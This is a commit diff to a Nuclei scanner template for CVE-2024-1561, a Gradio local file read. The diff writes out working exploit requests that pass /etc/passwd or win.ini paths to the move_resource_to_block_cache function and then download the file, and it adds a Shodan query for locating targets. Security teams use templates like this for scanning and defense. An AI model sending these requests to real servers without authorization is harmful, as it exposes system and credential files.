Support Both Windows & Linux (Gradio Applications - Local File Read)

2024-06-14 23:11:27 +05:30 · 2024-06-14 23:11:27 +05:30 · 34762c8da2
parent 55aa46ad95
commit 34762c8da2
1 changed files with 34 additions and 31 deletions
--- a/http/cves/2024/CVE-2024-1561.yaml
+++ b/http/cves/2024/CVE-2024-1561.yaml
@ -2,7 +2,7 @@ id: CVE-2024-1561

 info:
  name: Gradio Applications - Local File Read
-  author: Diablo
+  author: nvn1729,Diablo
  severity: high
  description: |
    Local file read by calling arbitrary methods of Components class
@ -16,6 +16,7 @@ info:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1561
    - https://github.com/gradio-app/gradio/commit/24a583688046867ca8b8b02959c441818bdb34a2
    - https://www.gradio.app/changelog#4-13-0
+    - https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
@ -25,50 +26,52 @@ info:
    epss-percentile: 0.36659
  metadata:
    verified: true
-    max-request: 3
+    max-request: 2
    shodan-query: html:"__gradio_mode__"
  tags: cve,cve2024,intrusive,unauth,gradio,lfi,lfr
-flow: http(1) && http(2) && http(3)

 http:
-  - raw:
-      - |
-        GET /config HTTP/1.1
-        Host: {{Hostname}}
-
-    extractors:
-      - type: json
-        name: first-component
-        part: body
-        group: 1
-        json:
-          - '.components[0].id'
-        internal: true
-
  - raw:
      - |
        POST /component_server HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

-        {"component_id": "{{first-component}}","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
+        {"component_id": "1", "data": "{{path}}", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa"}
+
+      - |
+        GET /file={{download_path}} HTTP/1.1
+        Host: {{Hostname}}

    extractors:
      - type: regex
-        name: tmpath
-        regex:
-          - \/[a-zA-Z0-9\/]+
+        part: body
+        name: download_path
        internal: true
+        group: 1
+        regex:
+          - "\"?([^\"]+)"

-  - raw:
-      - |
-        GET /file={{tmpath}} HTTP/1.1
-        Host: {{Hostname}}
+    payloads:
+      path:
+        - c:\\windows\\win.ini
+        - /etc/passwd

+    stop-at-first-match: true
+    matchers-condition: and
    matchers:
-      - type: dsl
-        dsl:
-          - regex('root:.*:0:0:', body)
-          - 'contains(header, "text/plain")'
-        condition: and
-# digest: 490a004630440220228b8f9ed4c8b48faa786cd1c48413831ef219341e029831e13f0a25f92be8a902204ff8d692224fa018c063b78b72507ddf2e92f2a750fd3b5cd0c01bc2f32a762f:922c64590222798bb761d5b6d8e72950
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+          - "\\[(font|extension|file)s\\]"
+        condition: or
+
+      - type: word
+        part: content_type
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200